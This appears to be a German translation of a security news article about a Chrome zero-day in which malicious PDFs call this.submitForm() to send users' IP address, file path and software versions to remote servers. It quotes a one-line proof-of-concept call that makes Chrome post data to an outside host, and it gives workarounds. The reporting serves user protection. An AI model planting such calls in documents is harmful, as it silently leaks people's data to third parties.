Exploit-Erkennungsdienst EdgeSpot hat eine faszinierende Zero-Day- Sicherheitsanfälligkeit in Chrome entdeckt, bei der PDF-Dokumente ausgenutzt werden. Die Sicherheitsanfälligkeit ermöglicht es Angreifern, vertrauliche Daten mit in Chrome geöffneten schädlichen PDF-Dokumenten zu sammeln.

Sobald das Opfer die entsprechenden PDF-Dateien in Google Chrome öffnet, arbeitet ein Schadprogramm im Hintergrund und sammelt Benutzerdaten.

Die Daten werden dann an den Remote-Server weitergeleitet, der von den Hackern kontrolliert wird. Sie fragen sich möglicherweise, welche Daten von den Angreifern gesaugt werden. Sie zielen auf die folgenden Daten auf Ihrem PC ab:

• IP Adresse
• Vollständiger Pfad der PDF-Datei auf dem System
• Betriebssystem- und Chrome-Versionen

Hüten Sie sich vor schädlingsbefallenen PDF-Dateien

Es könnte Sie überraschen, dass beim Öffnen von PDF-Dateien mit Adobe Reader nichts passiert. Darüber hinaus werden HTTP-POST-Anforderungen verwendet, um Daten ohne Benutzereingriff auf die Remoteserver zu übertragen.

Experten stellten fest, dass eine der beiden Domänen readnotifycom oder burpcollaboratornet die Daten empfing.

Sie können sich die Intensität des Angriffs vorstellen, indem Sie die Tatsache berücksichtigen, dass die meisten Antivirenprogramme die von EdgeSpot erkannten Beispiele nicht erkennen können.

Experten geben an, dass die Angreifer die PDF-Javascript-API "this.submitForm ()" verwenden, um die vertraulichen Informationen der Benutzer zu sammeln.

Wir haben es mit einem minimalen PoC getestet. Ein einfacher API-Aufruf wie "this.submitForm ('http://google.com/test')" veranlasst Google Chrome, die persönlichen Daten an google.com zu senden.

Die Experten stellten tatsächlich fest, dass dieser Chrome-Fehler von zwei unterschiedlichen Sätzen bösartiger PDF-Dateien ausgenutzt wurde. Beide wurden im Oktober 2017 bzw. im September 2018 in Umlauf gebracht.

Die gesammelten Daten können insbesondere von den Angreifern verwendet werden, um zukünftige Angriffe zu optimieren. Berichten zufolge wurde der erste Stapel von Dateien mit dem PDF-Verfolgungsdienst von ReadNotify kompiliert.

Benutzer können den Dienst verwenden, um die Benutzeransichten zu verfolgen. EdgeSpot hat keine Details zur Art des zweiten Satzes von PDF-Dateien mitgeteilt.

So bleiben Sie geschützt

Der Exploit-Erkennungsdienst EdgeSpot wollte die Nutzer von Chrome auf die potenziellen Risiken aufmerksam machen, da nicht erwartet wird, dass der Patch in naher Zukunft veröffentlicht wird.

EdgeSpot berichtete Google letztes Jahr über die Sicherheitslücke und das Unternehmen versprach, Ende April einen Patch zu veröffentlichen. H

Sie können jedoch eine vorübergehende Problemumgehung in Betracht ziehen, indem Sie die empfangenen PDF-Dokumente lokal mit einer alternativen PDF-Reader-App anzeigen.

Alternativ können Sie Ihre PDF-Dokumente auch in Chrome öffnen, indem Sie Ihre Systeme vom Internet trennen. In der Zwischenzeit können Sie auf das Chrome 74-Update warten, das voraussichtlich am 23. April veröffentlicht wird.